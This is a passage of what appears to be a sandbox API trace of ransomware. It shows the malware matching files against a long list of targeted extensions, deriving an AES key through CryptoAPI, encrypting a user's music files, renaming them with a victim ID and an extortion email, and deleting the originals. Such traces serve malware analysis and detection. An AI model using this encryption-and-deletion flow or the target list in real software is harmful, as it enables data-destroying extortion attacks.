gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".mp3") returned=".mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0190.968] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0190.969] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0190.969] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\qlk2er5ibu4cw97.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\qlk2er5ibu4cw97.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0191.015] ReadFile (in: hFile=0x2c0, lpBuffer=0xfdd180, nNumberOfBytesToRead=0xe81a, lpNumberOfBytesRead=0x18b350, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18b350*=0xe81a, lpOverlapped=0x0) returned 1
	[0191.020] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0191.020] CryptAcquireContextW (in: phProv=0x18af00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18af00*=0xfcb770) returned 1
	[0191.022] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0191.022] CryptCreateHash (in: hProv=0xfcb770, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18af04 | out: phHash=0x18af04) returned 1
	[0191.022] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0191.023] CryptHashData (hHash=0xfb9830, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0191.023] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0191.023] CryptDeriveKey (in: hProv=0xfcb770, Algid=0x6610, hBaseData=0xfb9830, dwFlags=0x1, phKey=0x18af08 | out: phKey=0x18af08*=0xfb91b0) returned 1
	[0191.023] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0191.023] CryptEncrypt (in: hKey=0xfb91b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18af1c*=0xe81a, dwBufLen=0xe81a | out: pbData=0x0*, pdwDataLen=0x18af1c*=0xe820) returned 1
	[0191.025] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0191.026] RtlMoveMemory (in: Destination=0xfeb9a8, Source=0xfdd180, Length=0xe81a | out: Destination=0xfeb9a8) 
	[0191.026] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0191.026] CryptEncrypt (in: hKey=0xfb91b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfeb9a8*, pdwDataLen=0x18aefc*=0xe81a, dwBufLen=0xe820 | out: pbData=0xfeb9a8*, pdwDataLen=0x18aefc*=0xe820) returned 1
	[0191.026] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0191.026] CryptDestroyKey (hKey=0xfb91b0) returned 1
	[0191.026] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0191.027] CryptDestroyHash (hHash=0xfb9830) returned 1
	[0191.027] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0191.027] CryptReleaseContext (hProv=0xfcb770, dwFlags=0x0) returned 1
	[0191.027] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0191.027] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18af18, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18af18*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0191.028] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0191.028] GetUserNameA (in: lpBuffer=0x18adfc, pcbBuffer=0x18af14 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18af14) returned 1
	[0191.029] wsprintfW (in: param_1=0x18af30, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\qlk2er5ibu4cw97.mp3.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 100
	[0191.029] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\qlk2er5ibu4cw97.mp3.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\qlk2er5ibu4cw97.mp3.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0191.030] WriteFile (in: hFile=0x388, lpBuffer=0xfeb9a8*, nNumberOfBytesToWrite=0xe820, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0xfeb9a8*, lpNumberOfBytesWritten=0x18b358*=0xe820, lpOverlapped=0x0) returned 1
	[0191.036] CloseHandle (hObject=0x388) returned 1
	[0191.036] CloseHandle (hObject=0x2c0) returned 1
	[0191.036] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\qlk2er5ibu4cw97.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\qlk2er5ibu4cw97.mp3")) returned 1
	[0191.043] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\qlk2er5ibu4cw97.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\qlk2er5ibu4cw97.mp3")) returned 0
	[0191.043] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64115990, ftCreationTime.dwHighDateTime=0x1d96de4, ftLastAccessTime.dwLowDateTime=0xa88361f0, ftLastAccessTime.dwHighDateTime=0x1d974dc, ftLastWriteTime.dwLowDateTime=0xa88361f0, ftLastWriteTime.dwHighDateTime=0x1d974dc, nFileSizeHigh=0x0, nFileSizeLow=0x41d9, dwReserved0=0x0, dwReserved1=0x0, cFileName="tw0geCh.m4a", cAlternateFileName="")) returned 1
	[0191.044] lstrcmpW (lpString1="tw0geCh.m4a", lpString2="..") returned 1
	[0191.044] lstrcmpW (lpString1="tw0geCh.m4a", lpString2=".") returned 1
	[0191.044] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\"
	[0191.044] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\", lpString2="tw0geCh.m4a" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\tw0geCh.m4a") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\tw0geCh.m4a"
	[0191.044] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\tw0geCh.m4a") returned 50
	[0191.044] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0191.044] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\tw0geCh.m4a", cchLength=0x32 | out: lpsz="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\tw0gech.m4a") returned 0x32
	[0191.044] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0191.045] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\tw0gech.m4a", lpSrch="help_decrypt_your_files") returned 0x0
	[0191.045] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\tw0gech.m4a" | out: lpString1="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\tw0gech.m4a") returned="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\tw0gech.m4a"
	[0191.045] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\tw0gech.m4a") returned 50
	[0191.045] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0191.045] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0191.045] StrStrW (lpFirst=".m4a", lpSrch=".") returned=".m4a"
	[0191.045] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0191.046] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".m4a") returned=".m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi